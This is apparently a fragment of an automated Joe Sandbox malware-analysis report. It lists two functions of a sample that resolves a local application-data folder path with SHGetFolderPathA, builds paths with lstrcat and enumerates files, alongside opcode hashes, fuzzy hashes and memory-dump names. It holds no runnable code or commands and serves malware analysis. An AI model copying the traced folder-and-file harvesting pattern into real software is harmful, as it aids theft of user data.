                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: dd9a5f26e514f1158d7bb8258088d4190c5543b1c26cfbccb7cdc3dc6615e3ff
                                • Instruction ID: 9075b19bca1c2e1648a47cb651a9ceb0be81e56fa4b7b0f54fc78a1d3ff9cfb6
                                • Opcode Fuzzy Hash: dd9a5f26e514f1158d7bb8258088d4190c5543b1c26cfbccb7cdc3dc6615e3ff
                                • Instruction Fuzzy Hash: E2F096329107129FE720BBB8581E7493FA0BF44717F14414FFC14A75D2DB6459489F56
                                Function 00554F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00554F7A
                                • lstrcat.KERNEL32(?,00561070), ref: 00554F97
                                • lstrcat.KERNEL32(?,0107A098), ref: 00554FAB
                                • lstrcat.KERNEL32(?,00561074), ref: 00554FBD
                                  • Part of subcall function 00554910: wsprintfA.USER32 ref: 0055492C
                                  • Part of subcall function 00554910: FindFirstFileA.KERNEL32(?,?), ref: 00554943
                                  • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                                  • Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                                  • Part of subcall function 00554910: FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                                  • Part of subcall function 00554910: FindClose.KERNEL32(000000FF), ref: 00554B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: 35b5f1682a6adc56160cad7ce8b1d0b1cd8f8343cd55b50636e63bea7d97e88e
                                • Instruction ID: c764d443fec126576a83e8c0cf76ee99363e59a14047bbfa82e47d8c3e9b7282
                                • Opcode Fuzzy Hash: 35b5f1682a6adc56160cad7ce8b1d0b1cd8f8343cd55b50636e63bea7d97e88e
                                • Instruction Fuzzy Hash: 6821DA7694020977D754FBB0DC5AEEE373CBB94300F008546B65A93181EE789ACC8FA6